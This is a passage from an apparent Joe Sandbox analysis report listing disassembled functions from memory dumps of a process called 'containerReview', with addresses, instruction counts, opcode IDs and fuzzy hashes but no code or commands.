                                                                    • Instruction Fuzzy Hash: 5BF03030A0C9198EEA64F604DC486B87392FF64390F9011BAD84EF71A3EF387D858648
                                                                    Function 00007FF848E75318 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d1c7dfccc88d550a0c504ef7a6d8429f03d32075b32a422873b135f7d92b8df
                                                                    • Instruction ID: 3775ec26be54088adbc8a92cabb63f1f2129e73afd593a2c5f1023abf952a6f9
                                                                    • Opcode Fuzzy Hash: 1d1c7dfccc88d550a0c504ef7a6d8429f03d32075b32a422873b135f7d92b8df
                                                                    • Instruction Fuzzy Hash: EED05E30B609094B8F0CB62D8458530B3D1F7AA20ABD45278940BC2281ED25ECCA8B84
                                                                    Function 00007FF848E724F0 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e050b8d54ee86617a2a68f3a03fac4af5aa2a852a7c447093bc185dd0ecb348e
                                                                    • Instruction ID: c5ab66f905dab5ce8e664c2ee63ef292b4a7005d8b279b4c03f09e3ad270fe9f
                                                                    • Opcode Fuzzy Hash: e050b8d54ee86617a2a68f3a03fac4af5aa2a852a7c447093bc185dd0ecb348e
                                                                    • Instruction Fuzzy Hash: 14D0A730B6090D4B8B0CB63D8458434F3D2F7AA2167D4527CD41BC3281ED25ECC6CB85
                                                                    Function 00007FF848E73A70 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                    Function 00007FF848E633D1 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction ID: cadf967c029e486b9d6c9b0734e6fc60d261c9c85d6428012597e678f49e7799
                                                                    • Opcode Fuzzy Hash: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction Fuzzy Hash: 0FE01A20F0D12A8FF795BA10C8503BD22A1BF85381F9450B9D86DB76E6CF387C818B49
                                                                    Function 00007FF848E63759 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d4b0ec0cb579521c937719aef03f6e241a8416c45da66fe7cc87ba479518b0e
                                                                    • Instruction ID: 8576958cd4ac830fef12b803800038b9b0a2429590f4631019fefa52e676df46
                                                                    • Opcode Fuzzy Hash: 8d4b0ec0cb579521c937719aef03f6e241a8416c45da66fe7cc87ba479518b0e
                                                                    • Instruction Fuzzy Hash: 0BE01211E1C5554EF29DB56C44313B950C1BF98751F884179D41EF32C3DE5C3C400396
                                                                    Function 00007FF848E74718 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 387e63c72d1cec51fb15f3eb6a8ae46cde76971a7f43caf43f88bfad3b8c216e
                                                                    • Instruction ID: 11fd52cc99a76da05a4c6e0ed7303f21fdb0b99c6a49702810bd3db6b46b8276
                                                                    • Opcode Fuzzy Hash: 387e63c72d1cec51fb15f3eb6a8ae46cde76971a7f43caf43f88bfad3b8c216e
                                                                    • Instruction Fuzzy Hash: 70D09230A1864A8FDB44EE08C880EAA33A1FB48704F204960E92983292DA35FC128B94
                                                                    Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction ID: 22c00e277981450ec3cfd80455c7aa1b3eb6fa9d4df6ebc78a5e847680a4518f
                                                                    • Opcode Fuzzy Hash: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction Fuzzy Hash: D6C08C00E5F53B08E445712E14020ACA2017BC42A0FD00032C02C700929EAD30C5034E
                                                                    Function 00007FF848E60B18 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction ID: efbce210bacd50ef177f3dfb13d4aceba7f181afd6019f63510de32bdeb12342
                                                                    • Opcode Fuzzy Hash: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction Fuzzy Hash: 39C04C305258098FC944FB6DC98995477A0FB1D215BD60190E40DC7171E66AEC95C745
                                                                    Function 00007FF848E612E0 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction ID: 66eda309ea09482d7201f089046b183db6eb6a68ed1dc125f00a417f2063d7f1
                                                                    • Opcode Fuzzy Hash: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction Fuzzy Hash: E0C08C309208088FC908FB28C88480433A0FB09200BC10090E008C7170E229ECD0C740
                                                                    Function 00007FF848E79E2C Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b567058f7eec8211f091f5570d3c48fa7a9be4ca05688d63650a906f9a98df37
                                                                    • Instruction ID: 865005724ea984a9f10bb49a6285fe106a7e2a3011e3fa3f03cccf382a9b41f2
                                                                    • Opcode Fuzzy Hash: b567058f7eec8211f091f5570d3c48fa7a9be4ca05688d63650a906f9a98df37
                                                                    • Instruction Fuzzy Hash: C8D0C930C095588FEBA0EB14C840B9972B1BF48341F5001F6900DE3285CB356DC0CF81
                                                                    Function 00007FF848E657D9 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9886f969631b8622db57c62c40443e3f41c75f09569109296586e9b90c744d2c
                                                                    • Instruction ID: 4590d09869e9cbbcc8ff1ce6a4fa223695932fbf36eb935e0cf4fa14607af0b4
                                                                    • Opcode Fuzzy Hash: 9886f969631b8622db57c62c40443e3f41c75f09569109296586e9b90c744d2c
                                                                    • Instruction Fuzzy Hash: 78C08C06F0EC165AE25A6204402027E04029F80B84F844035E01EC22CACF0D2B0102CA
                                                                    Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction ID: 11f8d10550346e9f3a4f007398059a370a93a6d624c90b1792530cf415cde2e8
                                                                    • Opcode Fuzzy Hash: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction Fuzzy Hash: E5B01200CAE41F04E408317A094206470417BC4140FC00070D40C70086D9DD3094034A

                                                                    Executed Functions

                                                                    Function 00007FF848E907AE Relevance: 2.5, Strings: 1, Instructions: 1225COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L_H
                                                                    • API String ID: 0-3184692415
                                                                    • Opcode ID: 619c40a2f4ba90bef11cfb91b2f7b14a1bcf9b2e3a5b3ea756c8cf9b178184f9
                                                                    • Instruction ID: 9e000794598c021df10299cec044b171d76f6fa92ac8cc269b83eccd0bb71d75
                                                                    • Opcode Fuzzy Hash: 619c40a2f4ba90bef11cfb91b2f7b14a1bcf9b2e3a5b3ea756c8cf9b178184f9
                                                                    • Instruction Fuzzy Hash: 1C82C231E1C95A9FEA98FA6884556B873E2FF98780F4445B9D00DC32C3DF39AC818785
                                                                    Function 00007FF848E90CFB Relevance: 2.2, Strings: 1, Instructions: 997COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L_H
                                                                    • API String ID: 0-3184692415
                                                                    • Opcode ID: d6996c0bb4fa35702703a28fe19514bc9322f98aaefee57e9bfb1a834cd25cf2
                                                                    • Instruction ID: b2b54cfd999f7f38d55fc948dea031e73fe64c3034864df3b5d4c48de7553b1b
                                                                    • Opcode Fuzzy Hash: d6996c0bb4fa35702703a28fe19514bc9322f98aaefee57e9bfb1a834cd25cf2
                                                                    • Instruction Fuzzy Hash: 9A62A331E1C95A9FEB98FA6884557B973E2FF99380F5441B9D00DC3282DF39AC828745
                                                                    Function 00007FF848E80D7C Relevance: .3, Instructions: 252COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7b863c4254e235fcfc0026a0e9c0e6d25df3b14c2bd85cd2b70b0a003da806e
                                                                    • Instruction ID: 2135f8cf4b1a55ca60437feb3c2925d9bc59e48e5eaa3d4307ce3cc840572dc4
                                                                    • Opcode Fuzzy Hash: e7b863c4254e235fcfc0026a0e9c0e6d25df3b14c2bd85cd2b70b0a003da806e
                                                                    • Instruction Fuzzy Hash: F091D171D6CA9A8FE789EB2888293B97FE2FB56310F4401BAC049D72D6DF791805C750
                                                                    Function 00007FF848E80B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9$"s9
                                                                    • API String ID: 0-3426396564
                                                                    • Opcode ID: e6bf74b1d6689e4a83ae90d40d4e0ea91c878e62ba1a472b45461e1a83e8e15a
                                                                    • Instruction ID: c75d19dd1440bff90666b6e73c3834fbe9e2ef524e49a33454ae36c10d1c5faa
                                                                    • Opcode Fuzzy Hash: e6bf74b1d6689e4a83ae90d40d4e0ea91c878e62ba1a472b45461e1a83e8e15a
                                                                    • Instruction Fuzzy Hash: 4F01A22671E95E8FC7426A3DB8904E8BB50EA87136B9903FBD444C7192E611585EC790
                                                                    Function 00007FF848E93A59 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M
                                                                    • API String ID: 0-3664761504
                                                                    • Opcode ID: 151fc46629cb6542186349de0fba22226ff57bf4e74de8e2c81e2386b3787558
                                                                    • Instruction ID: 2105793b150e0c4d808f7574db9bcf8193492773671094f9bf331fdc25ffa66e
                                                                    • Opcode Fuzzy Hash: 151fc46629cb6542186349de0fba22226ff57bf4e74de8e2c81e2386b3787558
                                                                    • Instruction Fuzzy Hash: 21F06D71A4E7C48FCB1AAA3888684547FA0EF6721174A51EEC046CF1A3EA2DCC89C701
                                                                    Function 00007FF848E808D0 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17a34d577befd5d85a457ca7a55218e4ff2803f5cd316d15c97c5d6d265baf38
                                                                    • Instruction ID: 22e7794b20e3d81df5c0e74f85884fe7d171ae37ee460782878ecaece97e62f1
                                                                    • Opcode Fuzzy Hash: 17a34d577befd5d85a457ca7a55218e4ff2803f5cd316d15c97c5d6d265baf38
                                                                    • Instruction Fuzzy Hash: B8417B62A4D9591FE708B77CB0992FD7781FF85361F4841BBD04DC71D3CE28A8818699
                                                                    Function 00007FF848E80998 Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 950f55ab8c61e3dda7cf446b8bcd2f9459ecd0d2653c09b22f9b3566d3abd8b3
                                                                    • Instruction ID: dbdccedfba0b33daf6ee57a26696e2e0240d6ad5d3bbe357a9b39490f2ee953a
                                                                    • Opcode Fuzzy Hash: 950f55ab8c61e3dda7cf446b8bcd2f9459ecd0d2653c09b22f9b3566d3abd8b3
                                                                    • Instruction Fuzzy Hash: EA21C421B1CD5A1FE788B63C545E67E77C2EF99361F5400B9E40EC32D3DE28AC828285
                                                                    Function 00007FF848E811A1 Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 561fe6d524354a31c3726ae922675e333ed1fe1d579b5268e2d273244c6056ec
                                                                    • Instruction ID: 170b8cbf0abdac2e3e369b99dd3cb4ff4a6b0902d045ca72a2ebb27c9000f520
                                                                    • Opcode Fuzzy Hash: 561fe6d524354a31c3726ae922675e333ed1fe1d579b5268e2d273244c6056ec
                                                                    • Instruction Fuzzy Hash: DB317F3090D64A8FDB45FB68C8599BD7BF0FF5A350F5509BAC009D72A2DB39A881CB50
                                                                    Function 00007FF848E94409 Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7c9197de4665bcf9b42bb146464450cfd2eb0eaeca26f28448613bd213850ca
                                                                    • Instruction ID: 9bb21eb921a379e390c54d732980988f6a3da37dbd4b424c94a2548992549774
                                                                    • Opcode Fuzzy Hash: b7c9197de4665bcf9b42bb146464450cfd2eb0eaeca26f28448613bd213850ca
                                                                    • Instruction Fuzzy Hash: 43212131D0CA8A4FE756BB7888641B93BA1FF95358F4802B7C44DC71D2EEBCA9468345
                                                                    Function 00007FF848E80C25 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0de9b5a35b4e8db8c03cfa213954b46d53228f17197049be2275b7a8af0d5923
                                                                    • Instruction ID: 84e0a708d9f9dd1bd4954127da77b6a121f5b3aa5fa684cb98f8365ea416b280
                                                                    • Opcode Fuzzy Hash: 0de9b5a35b4e8db8c03cfa213954b46d53228f17197049be2275b7a8af0d5923
                                                                    • Instruction Fuzzy Hash: F221F131A0D6899FE712FB68C8452EC7FA0FF42360F5546FAC0449B1D2DB382589CBA5
                                                                    Function 00007FF848E85534 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f242d40f8e07fcd480d7ca60b94bcceebd86f22d633e7c159618615c25f0f8e3
                                                                    • Instruction ID: 33b81ad697817bfef23e6977af00ad48e5e7f625a7b692c6b79fa48820916fce
                                                                    • Opcode Fuzzy Hash: f242d40f8e07fcd480d7ca60b94bcceebd86f22d633e7c159618615c25f0f8e3
                                                                    • Instruction Fuzzy Hash: 94113020D1CA0D8EEB64BB5898552BC72D2FF54390F9002B9E40ED72E2EF386D458659
                                                                    Function 00007FF848E80C40 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51b51ee47967c090e1d98d926f42711c5c3103de04a15cc76290c4e1994a8e5e
                                                                    • Instruction ID: 342968fa3378e427a3381ea3a66d139dd69b9f1e31098190cac507ceb0a2b43d
                                                                    • Opcode Fuzzy Hash: 51b51ee47967c090e1d98d926f42711c5c3103de04a15cc76290c4e1994a8e5e
                                                                    • Instruction Fuzzy Hash: E1016D7190D7889FE702FB68D85429D7FB0EF42250F1545E6C044DB292D63856498BA5
                                                                    Function 00007FF848E80C48 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61f267361a44370b1f9379d5f85cf2ace1cd23782622da2682046c63fdbeaf27
                                                                    • Instruction ID: 7dfd9f72c8f353c9211899a2f9d1a7621afab27e9593865db9cbea9f9d848e14
                                                                    • Opcode Fuzzy Hash: 61f267361a44370b1f9379d5f85cf2ace1cd23782622da2682046c63fdbeaf27
                                                                    • Instruction Fuzzy Hash: 19015A7190D7C89FE706EB78C84469DBFB0EF42314F1945EAD044DB2A2D6385A48CB95
                                                                    Function 00007FF848E8566A Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 739d002ec5213039a5f7b98b8673b3be312f800da77b00de52093fa9fbd50bdc
                                                                    • Instruction ID: b54cbc01da38b9a6d00b3b048e1525f264837db89ecec9b2eca75e64f697ab8b
                                                                    • Opcode Fuzzy Hash: 739d002ec5213039a5f7b98b8673b3be312f800da77b00de52093fa9fbd50bdc
                                                                    • Instruction Fuzzy Hash: 48F03C3080C91E8EEB64FB54DC446BC73A2FF54391F9001B9D44ED7192EF386D858A08
                                                                    Function 00007FF848E81A46 Relevance: .0, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 050d8432365884cb1a4db415e04935779a392ead5e7ca286c458fd269eae1f8b
                                                                    • Instruction ID: 3e78d386bf343ab5533b2e23f402a612562429f9c213e2e52dd480813c9a2b36
                                                                    • Opcode Fuzzy Hash: 050d8432365884cb1a4db415e04935779a392ead5e7ca286c458fd269eae1f8b
                                                                    • Instruction Fuzzy Hash: 1301CD31908918CFCB58EB18D894E9A73F1FBA8310F0546A9D44ED72A5DB35AE81CF85
                                                                    Function 00007FF848E80C50 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d814e798026f89ed8e6ab49ae84347f6349635a680f92c229919b17817bfd055
                                                                    • Instruction ID: 4b5f3a15fd256eb06a61bb326d718d987c5c690433d7f9b4a786018abbd4226b
                                                                    • Opcode Fuzzy Hash: d814e798026f89ed8e6ab49ae84347f6349635a680f92c229919b17817bfd055
                                                                    • Instruction Fuzzy Hash: 1F018B7090D7C89FE702FB74884429DBFB0FF02304F1841EAC044DB292DA385A48C755
                                                                    Function 00007FF848E94027 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 33e1281bed08d907b67bdd238c3c570bf61e84b53f4626b183c0ef938e085905
                                                                    • Instruction ID: cefc35b47d47c39c7a4d06576a2a07feaeefd4134cf327776d8c4fb456b9e7c6
                                                                    • Opcode Fuzzy Hash: 33e1281bed08d907b67bdd238c3c570bf61e84b53f4626b183c0ef938e085905
                                                                    • Instruction Fuzzy Hash: ABF0AF70E0940B8FEB48EA48D4646FE7BB2FF41394F00063ED006D3294DFB429018A84
                                                                    Function 00007FF848E946F9 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 083a21ada1682168b47cde5e652d200687d2cd7b1381fc97928a4b1d5b1f5c53
                                                                    • Instruction ID: ca11dfdc4ac035ebfef5e5f07573908d80b571bf04fb8596757515477366e88e
                                                                    • Opcode Fuzzy Hash: 083a21ada1682168b47cde5e652d200687d2cd7b1381fc97928a4b1d5b1f5c53
                                                                    • Instruction Fuzzy Hash: E2F05E30A1C91B4FE765BADC94409BEB290FF44B9CF104270D42AC3196EF78E8014688
                                                                    Function 00007FF848E80B77 Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
